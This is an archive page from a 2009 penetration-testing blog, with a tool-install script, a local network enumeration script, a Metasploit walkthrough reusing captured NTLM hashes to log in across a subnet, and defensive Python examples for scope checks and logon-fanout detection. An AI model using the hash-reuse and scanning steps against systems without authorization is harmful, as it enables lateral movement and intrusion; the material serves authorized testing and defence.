Archive for November 2009
pentesting with an ubuntu box
here’s a recent drop of a script i use to configure my ubuntu box for pentesting. yes, i could use backtrack (and i do — especially if i’m having wireless issues), but this is a quick way to get an ubuntu box up & running. cheers -jcran
#!/bin/bash

# System Configuration & Utilities
apt-get -y install build-essential
apt-get -y install linux-headers-`uname -r`
apt-get -y install sysvconfig
apt-get -y install bum ## Boot-Up Manager
apt-get -y install tofrodos ## DOS utils
apt-get -y install xinetd ## why not.
apt-get -y install unrar ## RAR support
apt-get -y install p7zip-full ## 7-Zip support
apt-get -y install fcrackzip ## Zip cracking
apt-get -y install ipcalc ## handy
apt-get -y install sharutils ## uuencode / uudecode
apt-get -y install xclip ## piping is handy
apt-get -y install ldap-utils
apt-get -y install cabextract ## damn microsoft and their fascist compression formats!
apt-get -y install g++
apt-get -y install ssh

## Network services
apt-get -y install samba
apt-get -y install nis
apt-get -y install nfs
apt-get -y install smbfs ## samba utilities
## apt-get -y install tftpd ## you need to modify the /etc/init.d file...

# system monitoring
apt-get -y install ntop
## apt-get -y install sysstat ## iostat,sar,mpstat
apt-get -y install procinfo

# Package Management
#apt-get -y install apt-build
#apt-get -y install apt-dpkg-ref
#apt-get -y install apt-listbugs
apt-get -y install apt-file
#apt-get -y install apt-howto
apt-get -y install apt-utils
apt-get -y install apt-listchanges
apt-get -y install dconf

# Terminal Emulators
apt-get -y install tn5250
apt-get -y install screen

# Filesystem Support
apt-get -y install sshfs
apt-get -y install ntfs-3g
apt-get -y install ntfs-config
apt-get -y install ntfsprogs
apt-get -y install mkisofs

# Gnome-Specific Configuration
apt-get -y install gconf
apt-get -y install gnomebaker
apt-get -y install nautilus-open-terminal

# ISAKMPD
# apt-get -y install isakmpd
apt-get -y install vpnc

# Multimedia
apt-get -y install amarok
apt-get -y install xmms
apt-get -y install xmms-skins
apt-get -y install xmms-mp4
apt-get -y install mpg123
apt-get -y install totem-xine
apt-get -y install ksnapshot
apt-get -y install istanbul
apt-get -y install recordmydesktop
apt-get -y install gtk-recordmydesktop
apt-get -y install xvidcap

# Basics
# Netcat & Tunnelling
apt-get -y install netcat
apt-get -y install sbd
apt-get -y install cryptcat
apt-get -y install socat
apt-get -y install vtun
apt-get -y install stunnel

# Scanning Tools
apt-get -y install nmap
apt-get -y install nessusd
apt-get -y install nessus
apt-get -y install fping
apt-get -y install hping2
apt-get -y install hping3
apt-get -y install scapy
apt-get -y install snmp
#apt-get -y install sing #send icmp nasty garbage
apt-get -y install traceroute
apt-get -y install tcptraceroute
apt-get -y install ike-scan ## ipsec vpn tool
apt-get -y install nbtscan ## cifs info tool
apt-get -y install sslscan

# Passive Scanning Tools
apt-get -y install p0f
apt-get -y install pads

# Sniffing Tools
apt-get -y install wireshark
apt-get -y install ettercap
apt-get -y install ettercap-gtk
apt-get -y install tcpdump
apt-get -y install tcpflow
apt-get -y install ssldump
apt-get -y install nemesis # packet injection
apt-get -y install dsniff
apt-get -y install etherape

# Libraries
apt-get -y install libssl #Medusa
apt-get -y install libssl-dev #Medusa
apt-get -y install libssh-2 #Medusa
apt-get -y install python-pycurl #wfuzz
apt-get -y install libnet-dns-perl #fierce.pl
apt-get -y install libsnmp-perl #??
apt-get -y install libcrypt-ssleay-perl #HEAD,GET,POST, libwhisker
apt-get -y install libnet-ssleay-perl # "" ""
apt-get -y install ncurses-dev # kismet-newcore
apt-get -y install libpcap-dev # kismet-newcore

# Cracking Tools
apt-get -y install john
apt-get -y install medusa
## apt-get -y install hydra? ## not really that useful..

# Wireless Tools
##apt-get -y install kismet ## disabled because of kismet-ng
apt-get -y install aircrack
apt-get -y install aircrack-ng

# App Layer Tools
apt-get -y install wget
apt-get -y install curl
apt-get -y install nikto

## Scripting
apt-get -y install ruby
apt-get -y install python
apt-get -y install perl
apt-get -y install perl-doc
apt-get -y install gawk
apt-get -y install vim-ruby
apt-get -y install vim-python

## Ruby - Gems
apt-get -y install gems
apt-get -y install rubygems

## Metasploit dependencies
apt-get -y install libopenssl-ruby
apt-get -y install ruby-libglade2
apt-get -y install libgtk2-ruby

## Scapy - Python Dependencies - http://www.secdev.org/projects/scapy/portability.html
apt-get -y install graphviz # graph stuff
apt-get -y install imagemagick # graph stuff
apt-get -y install python-gnuplot # PacketList.plot()
apt-get -y install python-crypto # WEP Stuff
apt-get -y install python-visual # 3D Stuff
apt-get -y install python-pyx # pdfdump() / psdump()
apt-get -y install acroread
apt-get -y install gv
apt-get -y install sox

## ProxyStrike Dependencies
apt-get -y install python-qt4
apt-get -y install python-openssl

## W3af Dependencies
apt-get -y install python-pyparsing
apt-get -y install python-pydot
apt-get -y install python-soappy

## Coding
##apt-get -y install eclipse - get the latest version...
apt-get -y install kdevelop
apt-get -y install subversion
apt-get -y install rapidsvn
apt-get -y install vim-full
apt-get -y install git
apt-get -y install git-core

## Documentation
apt-get -y install notecase
apt-get -y install vim
apt-get -y install liferea

## Web / Browser Utilities
apt-get -y install azureus
apt-get -y install opera
apt-get -y install filezilla
apt-get -y install flashplugin-nonfree
apt-get -y install pidgin
apt-get -y install pidgin-otr
apt-get -y install thunderbird
apt-get -y install lightning-extension
apt-get -y install enigmail
apt-get -y install irssi
apt-get -y install silc
apt-get -y install tor

## Windows Stuff
apt-get -y install wine
apt-get -y install quicksynergy

## Encryption
apt-get -y install dmsetup
apt-get -y install password-gorilla
apt-get -y install gpa
apt-get -y install seahorse

## Java
apt-get -y install sun-java6-jre
apt-get -y install sun-java6-plugin
#set our java version to java-6-sun as this plays well with burpsuite
update-java-alternatives -s java-6-sun

## Upgrade & Such
apt-get update
apt-get upgrade
apt-get dist-upgrade

## Remove auto-start services
update-rc.d -f exim4 remove
update-rc.d -f tor remove
update-rc.d -f ntop remove
update-rc.d -f p0f remove ## not sure this is necessary
update-rc.d -f pads remove
update-rc.d -f isakmpd remove
update-rc.d -f nessusd remove
update-rc.d -f cups remove
update-rc.d -f samba remove
update-rc.d -f nis remove
update-rc.d -f nfs-common remove

### Manual installs
### ------------------------------------------------------------------------------------------
### truecrypt -- http://www.howtogeek.com/howto/ubuntu/install-truecrypt-on-ubuntu-edgy/
### - you will need the linux kernel source for this one...
### onesixtyone -- http://www.phreedom.org/solar/onesixtyone/
### libdvdcss2 -- "sudo /usr/share/doc/libdvdread3/./install-css.sh"
WiFiFoFum for locating rogue access points!
what’s that you say? The PCI DSS (wireless supplement) now requires that you have to do quarterly wireless scanning at your facility?
oh? you have no budget?
no problem. get an ipod touch, and download WiFiFoFum from Aspecto Software. For $2.99, you’ve got yourself a wireless scanning solution.


local network enumeration
UPDATED: 11/19/2009
little script i threw together for local network enumeration – uses arp-scan, propecia, and nmap. was going to use it to dynamically generate my subnet (hence the IP parsing), but got lazy at the last minute.
#!/bin/bash
## jcran - 2009

## Gather user options
## --------------------
if [ $# -lt 1 ]; then
  echo "Usage: $0 [projectname] [scan? (0/1) ] "
  exit -1
fi

PROJECT=$1        ## name of the project
SCAN=${2:-0}      ## whether to scan with propecia / nmap (defaults to 0 so a missing arg doesn't break the test below)

echo "creating project $PROJECT"
if [ -d $PROJECT ]; then
  echo "project exists"
else
  mkdir $PROJECT
fi

## pull our address and netmask off eth0 and let ipcalc turn them into the network range
## (`ips` is not a stock tool; it is assumed to be a local helper that picks IP addresses out of stdin)
IP=`ifconfig eth0 | grep "inet addr:" | ips | cut -d ":" -f 2 | cut -d " " -f 1`
SUBNET=`ifconfig eth0 | grep "inet addr:" | ips | cut -d ":" -f 3 | cut -d " " -f 1`
RANGE=`ipcalc $IP/$SUBNET | grep "Network:" | cut -d ' ' -f 4`
echo $RANGE

if [ $SCAN -eq 1 ]; then
  echo arp scanning "$RANGE"
  sudo arp-scan "$RANGE" --interface eth0 > $PROJECT/arp.targets.txt

  echo local segment targets
  cat $PROJECT/arp.targets.txt | ips > $PROJECT/ip.targets.txt

  echo "scanning for web servers - :80, :443"
  propecia $RANGE 80 > $PROJECT/80.targets.txt
  propecia $RANGE 443 > $PROJECT/443.targets.txt

  echo "scanning for basics - :21 :22 :23 :111"
  propecia $RANGE 21 > $PROJECT/21.targets.txt
  propecia $RANGE 22 > $PROJECT/22.targets.txt
  propecia $RANGE 23 > $PROJECT/23.targets.txt
  propecia $RANGE 111 > $PROJECT/111.targets.txt

  echo "scanning for windows boxes - :445"
  propecia $RANGE 445 > $PROJECT/445.targets.txt

  echo "scanning for sql server tds - :1433"
  propecia $RANGE 1433 > $PROJECT/1433.targets.txt

  echo "scanning for oracle tns - :1521"
  propecia $RANGE 1521 > $PROJECT/1521.targets.txt

  echo nmap-scanning local ips
  nmap -iL $PROJECT/ip.targets.txt -oA $PROJECT/local-attack
fi
cheers
-jcran
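Added example, not part of the original post and not jcran's code: the two things the script above leaves loose are deriving RANGE from the interface (the "got lazy" part) and checking that the derived range is actually one you are cleared to scan before arp-scan and nmap run against it. The Python below does both, and also plays the role of the `ips` filter for arp-scan output. It assumes the old `inet addr:` ifconfig layout the script greps for and arp-scan's default output layout; both sample outputs are constructed, not captured from a real host.

```python
import ipaddress
import re

# Constructed sample of `ifconfig eth0` output in the "inet addr:" format the
# script greps for (not captured from a real host).
IFCONFIG_SAMPLE = """eth0      Link encap:Ethernet  HWaddr 00:11:22:33:44:55
          inet addr:10.1.1.42  Bcast:10.1.1.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
"""

# Constructed sample of `arp-scan --interface eth0 10.1.1.0/24` output; the
# banner and summary lines are what a target-list parser has to skip.
ARP_SCAN_SAMPLE = """Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.1.1.1\t00:11:22:33:44:01\tExample Vendor
10.1.1.21\t00:11:22:33:44:21\tExample Vendor
10.1.1.25\t00:11:22:33:44:25\t(Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.6: 256 hosts scanned in 1.5 seconds (170.67 hosts/sec). 3 responded
"""


def interface_network(ifconfig_text):
    """Return the CIDR the interface sits on, i.e. what the IP/SUBNET/ipcalc
    pipeline in the script is meant to derive."""
    m = re.search(r"inet addr:(\d+\.\d+\.\d+\.\d+).*?Mask:(\d+\.\d+\.\d+\.\d+)", ifconfig_text)
    if m is None:
        raise ValueError("no IPv4 address on interface")
    ip, mask = m.groups()
    # ipaddress accepts a dotted netmask after the slash; .network drops the host bits
    return str(ipaddress.IPv4Interface(f"{ip}/{mask}").network)


def arp_targets(arp_scan_text):
    """Keep only lines that begin with an IPv4 address (the job the script's
    `ips` filter does), dropping arp-scan's banner and summary lines."""
    targets = []
    for line in arp_scan_text.splitlines():
        m = re.match(r"^(\d{1,3}(?:\.\d{1,3}){3})\s", line)
        if m:
            targets.append(m.group(1))
    return targets


def in_scope(network, authorized):
    """Scope gate: True only if the derived range sits inside one of the
    ranges we are authorized to scan, so a mis-parsed interface cannot
    silently widen the scan."""
    net = ipaddress.IPv4Network(network)
    return any(net.subnet_of(ipaddress.IPv4Network(a)) for a in authorized)


if __name__ == "__main__":
    rng = interface_network(IFCONFIG_SAMPLE)
    print("range:", rng)
    if not in_scope(rng, ["10.1.0.0/16"]):  # authorized scope is a placeholder
        raise SystemExit("derived range is outside the authorized scope")
    for ip in arp_targets(ARP_SCAN_SAMPLE):
        print("target:", ip)
```

In the script this would replace the three backtick pipelines and sit before the `if [ $SCAN -eq 1 ]` block: feed `ifconfig eth0` to `interface_network`, refuse to continue if `in_scope` is false, and pipe `arp.targets.txt` through `arp_targets` to produce `ip.targets.txt`.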

owning a windows network
so… you say you were able to grab LM / NTLM hashes from a windows box??? cool. now use them in the scanner/smb/login to check & see which systems use the same hashes:
msf exploit(psexec) > use scanner/smb/login
msf auxiliary(login) > info

       Name: SMB Login Check Scanner
    Version: 0
    License: Metasploit Framework License (BSD)

Provided by:
  tebo <tebo@attackresearch.com>

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  RHOSTS                      yes       The target address range or CIDR identifier
  RPORT      445              yes       Set the SMB service port
  SMBDomain  WORKGROUP        no        SMB Domain
  SMBPass                     no        SMB Password
  SMBUser    Administrator    no        SMB Username
  THREADS    1                yes       The number of concurrent threads

Description:
  This module will test a SMB login on a range of machines and report
  successful logins. If you have loaded a database plugin and
  connected to a database this module will record successful logins
  and hosts so you can track your access.

msf auxiliary(login) > set RHOSTS 10.1.1.0/24
RHOSTS => 10.1.1.0/24
msf auxiliary(login) > set SMBPass XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX (hash goes here)
SMBPass => XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
msf auxiliary(login) > exploit
[*] 10.1.1.6 – FAILED 0xc000006d – STATUS_LOGON_FAILURE
[*] 10.1.1.21 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.21
[*] 10.1.1.25 – SUCCESSFUL LOGIN (Windows 5.0)
[*] Recording successful SMB credentials for 10.1.1.25
[*] 10.1.1.29 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.29
[*] 10.1.1.28 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.28
[*] 10.1.1.31 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 1)
To speed it up, set THREADS > 1. Be careful not to set it too high:
[*] Error: 10.1.1.189: ActiveRecord::StatementInvalid SQLite3::BusyException: database is locked: INSERT INTO "hosts" ("address", "name", "comm", "os_lang", "mac", "os_sp", "arch", "os_flavor", "address6", "os_name", "desc", "created", "state") VALUES('10.1.1.189', NULL, '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '2009-11-06 10:48:09', 'unknown')
Thanks to tebo for the excellent work. Now, if only it worked with credcollect.
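Added example, written here rather than taken from the post or from Metasploit: the output above is what shared local-admin credentials look like from the scanner's side, one credential succeeding on five hosts in seconds. From the other side of the wire, the same event is one source address completing network logons to many hosts with the same account in a very short window, which is the check a defender would want over their logon telemetry. The Python below runs that check over constructed records whose fields are modelled on a Windows 4624 logon-type-3 event (timestamp, target host, account, authentication package, source IP, outcome); the rows, hostnames, window and threshold are all made up for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed, simplified network-logon records. Fields are modelled on a
# Windows 4624 (logon type 3) event, but these rows are made up, not telemetry:
# (timestamp, target host, account, auth package, source IP, outcome)
SAMPLE_LOGONS = [
    ("2009-11-06 10:48:01", "SRV21", "Administrator", "NTLM", "10.1.1.50", "success"),
    ("2009-11-06 10:48:02", "SRV6",  "Administrator", "NTLM", "10.1.1.50", "failure"),
    ("2009-11-06 10:48:03", "SRV25", "Administrator", "NTLM", "10.1.1.50", "success"),
    ("2009-11-06 10:48:05", "SRV29", "Administrator", "NTLM", "10.1.1.50", "success"),
    ("2009-11-06 10:48:06", "SRV28", "Administrator", "NTLM", "10.1.1.50", "success"),
    # a human admin touching two boxes an hour apart: below the host threshold
    ("2009-11-06 09:00:00", "SRV21", "jdoe",          "NTLM", "10.1.1.7",  "success"),
    ("2009-11-06 10:05:00", "SRV25", "jdoe",          "NTLM", "10.1.1.7",  "success"),
    # a service account reaching three hosts, but spread across a day: outside the window
    ("2009-11-06 08:00:00", "SRV21", "backup",        "NTLM", "10.1.1.9",  "success"),
    ("2009-11-06 14:00:00", "SRV25", "backup",        "NTLM", "10.1.1.9",  "success"),
    ("2009-11-06 20:00:00", "SRV28", "backup",        "NTLM", "10.1.1.9",  "success"),
]


def flag_credential_fanout(logons, window=timedelta(minutes=10), min_hosts=3, package="NTLM"):
    """Return {(source_ip, account): sorted hosts} for every source/account pair
    that logged on successfully to at least `min_hosts` distinct hosts inside
    some `window`-long span.  Failures are ignored here: a burst of failures is
    a separate (spray) signal; this one keys on successes, which is what a
    reused credential produces."""
    by_key = defaultdict(list)
    for ts, host, account, pkg, src, outcome in logons:
        if outcome != "success" or pkg != package:
            continue
        by_key[(src, account)].append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), host))

    alerts = {}
    for key, events in by_key.items():
        events.sort()  # chronological, so the slice below is the window starting at each event
        for i, (start, _) in enumerate(events):
            hosts = {h for t, h in events[i:] if t - start <= window}
            if len(hosts) >= min_hosts:
                alerts[key] = sorted(hosts)
                break
    return alerts


if __name__ == "__main__":
    for (src, account), hosts in flag_credential_fanout(SAMPLE_LOGONS).items():
        print(f"{account} from {src} authenticated to {len(hosts)} hosts in one window: {hosts}")
```

The window and host count are the tuning knobs: widen the window and the day-long `backup` pattern also trips, which is the right call only if that account is not expected to reach several hosts per day. The finding on the scanner side (the same hash working everywhere) and the finding on the log side (one source fanning out) point at the same fix, which is not sharing a local administrator credential across the segment.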

checking valid windows logins with metasploit
so you have some windows creds, and you want to check if they’re valid or not. turns out there’s a bunch of ways to do this:
1) auxiliary/scanner/smb/login
2) db_autopwn -m
3) msfcli scripting
4) sussuro’s method (python scripting through xmlrpc)
others?
